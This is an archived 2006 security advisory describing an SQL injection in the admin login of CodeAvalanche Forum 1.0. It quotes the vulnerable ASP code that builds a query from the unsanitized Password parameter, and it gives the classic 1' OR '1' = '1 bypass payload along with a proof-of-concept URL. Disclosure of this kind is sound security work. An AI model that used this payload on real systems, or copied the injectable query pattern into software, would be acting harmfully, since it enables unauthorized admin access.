Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Web BBS :: etc :: b06-2649.htm

CA Forum Remote SQL Injection



CA Forum Remote SQL Injection
CA Forum Remote SQL Injection



------------------------------------------------------------------=0D
               - CAForum 1.0 Remote SQL Injection -=0D
-= http://colander.altervista.org/advisory/CAForum.txt =-=0D 
------------------------------------------------------------------=0D
=0D
	    -= CodeAvalanche Forum Version 1.0 =-=0D
=0D
=0D
=0D
Omnipresent=0D
june 01, 2006=0D
=0D
=0D
Vunerability(s):=0D
----------------=0D
SQL Injection=0D
=0D
=0D
=0D
Product:=0D
--------=0D
CodeAvalanche Forum Version 1.0=0D
=0D
Vendor:=0D
--------=0D
http://www.truecontent.info/codeavalanche/asp-forum-script.php=0D 
=0D
=0D
Description of product:=0D
-----------------------=0D
=0D
CodeAvalanche FreeForum is asp forum application which allows free posting, there is no needs for registration of your=0D
visitors. Administrator can add unlimited number of forum categories.=0D
=0D
=0D
Vulnerability / Exploit:=0D
------------------------=0D
=0D
In the file default.asp in Admin directory is vulnerable to an Remote SQL Injection Attack.=0D
A malicious people can gain Admin rights by putting rights parameters in the Password Variable.=0D
=0D
Let's Check the source code:=0D
=0D
<% Response.Buffer = True =0D
=0D
=0D
userLogged=false=0D
If Request("Password")<>"" Then =0D
'response.Write(Request("Password")) =0D
'response.flush=0D
=0D
dim rsUser,selectSQL=0D
selectSQL="SELECT * FROM PARAMS where PASSWORD='" & Request("Password") & "'"=0D
=0D
=0D
[...]=0D
=0D
=0D
=0D
[End default.asp]=0D
=0D
As you can see the variable Password is not properly sanitized before be used, so an attacker can put this string in the=0D
password field:=0D
=0D
=0D
1' OR '1' = '1=0D
=0D
So, the query will be:=0D
=0D
selectSQL="SELECT * FROM PARAMS where PASSWORD='1' OR '1' = '1'=0D
=0D
=0D
And you can gain access to the application with admin rights.=0D
=0D
=0D
PoC / Proof of Concept of SQL Injection:=0D
----------------------------------------=0D
=0D
This is a simple Proof Of Concept used on my local machine:=0D
=0D
=0D
http://127.0.0.1/[Application_Path]/[CAForum]/admin/default.asp?password=1'%20OR%20'1'%20=%20'1=0D 
=0D
=0D
Vendor Status=0D
-------------=0D
=0D
Not informed!=0D
=0D
Credits:=0D
--------=0D
omnipresent=0D
omnipresent@email.it 


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH